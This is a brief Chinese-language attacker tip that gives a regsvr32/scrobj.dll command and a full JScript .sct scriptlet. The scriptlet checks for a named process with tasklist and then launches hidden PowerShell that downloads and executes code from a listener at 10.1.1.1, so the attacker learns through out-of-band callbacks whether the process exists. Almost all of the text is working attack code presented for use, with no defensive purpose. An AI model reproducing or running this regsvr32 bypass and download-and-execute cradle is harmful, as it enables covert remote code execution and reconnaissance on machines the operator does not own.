当我们无法获取回显判断进程是否存活的方法
调用命令regsvr32 /s /n /u /i:<url/aa.sct> scrobj.dll
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("cmd /c tasklist|findstr 进程名&&powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://10.1.1.1:80')");
]]>
</script>
</registration>
</scriptlet>
这里就是通过tasklist判断有没有这个进程,如果有这个进程的话,再通过powershell去连接我们监听的端口,然后我们通过观察日志就可以知道到底有没有这个进程